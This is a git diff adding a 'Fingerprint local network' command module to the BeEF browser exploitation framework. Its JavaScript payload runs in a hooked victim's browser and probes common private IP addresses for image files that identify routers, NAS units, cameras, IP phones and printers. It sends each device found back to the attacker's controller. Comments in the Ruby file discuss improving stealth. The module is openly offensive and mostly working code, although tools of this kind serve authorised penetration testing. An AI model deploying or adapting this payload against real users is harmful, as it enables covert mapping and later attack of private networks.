diff --git a/modules/commands/network/detect_local_settings/fingerprint_local_network.js b/modules/commands/network/detect_local_settings/fingerprint_local_network.js new file mode 100644 index 000000000..c9ebbecc3 --- /dev/null +++ b/modules/commands/network/detect_local_settings/fingerprint_local_network.js @@ -0,0 +1,51 @@ +beef.execute(function() { + + var dom = document.createElement('b'); + var ips = [ + 'http://192.168.0.1', + 'http://192.168.0.100', + 'http://192.168.0.254', + 'http://192.168.1.1', + 'http://192.168.1.100', + 'http://192.168.1.254', + 'http://10.0.0.1', + 'http://10.1.1.1', + 'http://192.168.2.1', + 'http://192.168.2.254', + 'http://192.168.100.1', + 'http://192.168.100.254', + 'http://192.168.123.1', + 'http://192.168.123.254' + ]; + var urls = new Array( + new Array("QNAP NAS",":8080","/ajax_obj/img/running.gif",16,16), + new Array("QNAP NAS",":8080","/ajax_obj/images/qnap_logo_w.gif",115,21), + new Array("Belkin Router",":80","/images/title_2.gif",321,28), + new Array("SMC Networks",":80","/images/logo.gif",133,59), + new Array("Linksys NAS",":80","/Admin_top.JPG",750,52), + new Array("Linksys NAS",":80","/logo.jpg",194,52), + new Array("Linksys Network Camera",":80","/welcome.jpg",146,250), + new Array("Linksys Wireless-G Camera",":80","/header.gif",750,97), + new Array("Cisco IP Phone",":80","/Images/Logo",120,66), + new Array("Snom Phone",":80","/img/snom_logo.png",168,62), + new Array("Brother Printer",":80","/pbio/brother.gif",144,52), + new Array("HP LaserJet",":80","/hp/device/images/logo.gif",42,27) + ); + + // for each ip + for(var i=0; i < ips.length; i++) { + + // for each url + for(var u=0; u < urls.length; u++) { + var img = new Image; + img.id = u; + img.src = ips[i]+urls[u][1]+urls[u][2]; + //img.title = ips[i]+urls[u][1]; + img.onload = function() { if (this.width == urls[this.id][3] && this.height == urls[this.id][4]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } + dom.appendChild(img); + } + } + // setTimeout("beef.net.send('<%= @command_url %>', <%= @command_id %>,'device=Failed')", 60000) + +}); + diff --git a/modules/commands/network/detect_local_settings/fingerprint_local_network.rb b/modules/commands/network/detect_local_settings/fingerprint_local_network.rb new file mode 100644 index 000000000..214ccd3a7 --- /dev/null +++ b/modules/commands/network/detect_local_settings/fingerprint_local_network.rb @@ -0,0 +1,70 @@ +module BeEF +module Modules +module Commands +# +# Fingerprint local network module +# This module attempts to fingerprint embedded devices within the zombies' +# local network. It does this by loading images on common local network +# IP addresses then matching the image width, height and path to those +# for a known device. +# +# TODO # +# +# Add IPv6 support +# Add HTTPS support +# - Devices with invalid certs are blocked by IE and FF by default +# Improve stealth +# - Load images with CSS "background:" CSS to avoid http auth login popups +# Improve speed +# - Make IP addresses a user-configurable option rather than a hard-coded list +# - Detect local ip range first - using browser history and/or with java +# - History theft via CSS history is patched in modern browsers. +# - Local IP theft with Java is slow and may fail + + +class Fingerprint_local_network < BeEF::Command + + def initialize + super({ + 'Name' => 'Fingerprint local network', + 'Description' => 'Scan common local network IP addresses for embedded devices.', + 'Category' => 'Network', + 'Author' => ['bcoles@gmail.com', 'wade'], + 'File' => __FILE__ + }) + + # Doesn't work in FF4 (but works in 3.x) + set_target({ + 'verified_status' => VERIFIED_USER_NOTIFY, + 'browser_name' => FF + }) + + set_target({ + 'verified_status' => VERIFIED_NOT_WORKING, + 'browser_name' => O + }) + + set_target({ + 'verified_status' => VERIFIED_USER_NOTIFY, + 'browser_name' => IE + }) + + use_template! + end + + def callback + content = {} + content['device'] =@datastore['device'] if not @datastore['device'].nil? + content['url'] = @datastore['url'] if not @datastore['url'].nil? + if content.empty? + content['fail'] = 'Did not detect any local network devices' + end + save content + end + +end + +end +end +end +